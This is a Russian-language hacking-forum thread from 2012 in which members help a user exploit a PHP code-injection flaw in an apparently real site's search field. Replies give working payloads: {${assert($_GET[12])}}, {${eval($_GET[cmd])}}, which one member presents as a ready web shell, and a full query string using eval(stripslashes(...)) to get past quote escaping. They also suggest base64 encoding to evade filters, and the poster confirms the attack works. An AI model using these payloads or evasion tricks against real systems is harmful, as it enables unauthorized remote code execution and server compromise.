php injection обход логики

Discussion in 'Песочница' started by Avtoritet, 26 Sep 2012.

Thread Status:
Not open for further replies.
  1. Avtoritet

    Avtoritet Member

    Joined:
    29 Sep 2010
    Messages:
    174
    Likes Received:
    10
    Reputations:
    -5
    На сайте найдена уязвимость в строке поиска забиваешь {${phpinfo()}} и получаешь всю раскладочку по нему. когда вбиваешь ковычку он её меняет на \ и удаляет всё что после. а каждую \ умножает на 2. как обойти логику?
     
  2. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Можно попробовать:
    Code:
    {${assert($_GET[12])}}
    Если _ тоже фильтруется, можно использовать PHP-функции для работы с массивами, наподобие end, restet, prev и использовать их по отношению к $GLOBALS или использовать функции(При фильтровании $), значение которых можно устанавливать самим, в названии которой не содержится фильтруемых символов, однако в зависимости от сборки таких может не быть.

    UDP:
    Для каждого отдельного случая нужно самостоятельно подбирать вариации кода.
     
    #2 randman, 26 Sep 2012
    Last edited: 26 Sep 2012
    1 person likes this.
  3. Avtoritet

    Avtoritet Member

    Joined:
    29 Sep 2010
    Messages:
    174
    Likes Received:
    10
    Reputations:
    -5
    Warning: assert() [function.assert]: Assertion failed in /var/www/...../www/netcat/require/s_list.inc.php(292) : eval()'d code on line 1
    вот что выпало
     
  4. C.php

    C.php New Member

    Joined:
    18 Jun 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Что мешает написать прямо так {${eval($_GET[cmd])}} .
    Готовый шелл прямо :)
     
  5. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Можно еще загонять в base64, с его помощью можно передавать большие запросы не боясь фильтра кавычек!
     
  6. Avtoritet

    Avtoritet Member

    Joined:
    29 Sep 2010
    Messages:
    174
    Likes Received:
    10
    Reputations:
    -5
    как не странно, такой обрабатывает корректно. и пишет по вашему запросу ничего не найдено.
     
  7. Avtoritet

    Avtoritet Member

    Joined:
    29 Sep 2010
    Messages:
    174
    Likes Received:
    10
    Reputations:
    -5
    амперсанта фильтруется тоже.
     
  8. Avtoritet

    Avtoritet Member

    Joined:
    29 Sep 2010
    Messages:
    174
    Likes Received:
    10
    Reputations:
    -5
    когда вбиваешь {${print(2)}} он выводит 22
     
  9. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    ?action=index&text={${eval($_GET[cmd])}}&cmd=phpinfo();

    как я понял у тебя MQ= on и ты сразу не можешь вставить код с кавычкой :

    ?action=index&text={${eval(stripslashes($_GET[cmd]))}}&cmd=echo 'fff';
     
    _________________________
    1 person likes this.
  10. Avtoritet

    Avtoritet Member

    Joined:
    29 Sep 2010
    Messages:
    174
    Likes Received:
    10
    Reputations:
    -5
    Долго думает потом опера выдаёт следующее:

    Could not locate remote server

    Check that the address is spelled correctly, or try searching for the site.
     
  11. Avtoritet

    Avtoritet Member

    Joined:
    29 Sep 2010
    Messages:
    174
    Likes Received:
    10
    Reputations:
    -5
    ты реально крут! всё работате 10+
     
  12. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    закрыто
     
    _________________________
    1 person likes this.
Thread Status:
Not open for further replies.